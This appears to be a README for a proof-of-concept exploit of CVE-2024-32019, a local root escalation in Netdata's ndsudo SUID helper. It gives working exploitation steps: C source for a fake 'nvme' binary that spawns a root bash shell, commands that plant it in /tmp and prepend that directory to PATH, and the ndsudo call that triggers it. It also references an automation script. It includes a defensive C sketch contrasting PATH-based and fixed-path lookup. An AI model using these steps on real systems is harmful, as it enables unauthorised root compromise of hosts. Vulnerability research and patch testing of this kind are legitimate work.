CVE-2024-32019 PoC — Netdata Security Vulnerability

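Related vulnerability
Title: Netdata Security Vulnerability (CVE-2024-32019)
Description: Netdata is a high-fidelity infrastructure monitoring and troubleshooting application open-sourced by Netdata. Netdata has a security vulnerability. An attacker can exploit this vulnerability to run arbitrary programs with root privileges.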
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Introduction
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.
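
The lookup flaw described above, reduced to its core and shown beside a hardened form. This is an added example, not code from Netdata or from this repository; the function names, the trusted directory list and the planted file name are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed trusted search list for this sketch; a real helper pins its own. */
static const char *TRUSTED_DIRS = "/usr/sbin:/usr/bin:/sbin:/bin";
/* Find `name` in a colon-separated directory list: 0 and `out` set, or -1. */
static int find_in(const char *dirs, const char *name, char *out, size_t n) {
    struct stat st;
    int rc = -1;
    if (!dirs || !*name || strchr(name, '/')) return -1; /* bare names only */
    char *copy = strdup(dirs), *save = NULL;
    if (!copy) return -1;
    for (char *d = strtok_r(copy, ":", &save); d && rc; d = strtok_r(NULL, ":", &save)) {
        if (d[0] != '/' || snprintf(out, n, "%s/%s", d, name) >= (int)n) continue;
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 0111)) rc = 0;
    }
    free(copy);
    return rc;
}

/* Vulnerable pattern: the search list comes from the caller's environment. */
int resolve_from_env(const char *nm, char *out, size_t n) { return find_in(getenv("PATH"), nm, out, n); }
/* Hardened pattern: the environment is never consulted. */
int resolve_trusted(const char *nm, char *out, size_t n) { return find_in(TRUSTED_DIRS, nm, out, n); }

/* Constructed scenario: an empty file with an otherwise unused name sits in a caller-owned directory
 * put first in PATH (PATH stays modified). Returns 1 if the resolver selects it, 0 if not, -1 on error. */
int planted_file_wins(int use_trusted) {
    char dir[] = "/tmp/pathdemoXXXXXX", file[64], hit[256] = "", path[4096];
    const char *name = "constructed-helper", *old = getenv("PATH");
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/%s", dir, name);
    FILE *f = fopen(file, "w");
    if (!f) { rmdir(dir); return -1; }
    fclose(f); chmod(file, 0755);
    snprintf(path, sizeof path, "%s:%s", dir, old ? old : "/usr/bin:/bin");
    setenv("PATH", path, 1);
    int rc = (use_trusted ? resolve_trusted : resolve_from_env)(name, hit, sizeof hit);
    unlink(file); rmdir(dir);
    return rc == 0 && strncmp(hit, dir, strlen(dir)) == 0;
}

int main(void) {
    int env = planted_file_wins(0), trusted = planted_file_wins(1);
    printf("PATH lookup picks planted file: %d, trusted lookup: %d\n", env, trusted);
    return 0;
}
```

A SUID helper that still relies on `execvp`-style lookup should at minimum overwrite `PATH` with a fixed value before it executes anything, so that child processes do not inherit the caller's search list either.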

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have SSH access to the target, you can use `CVE-2024-32019-dbs.py` to automate these steps.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019: Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)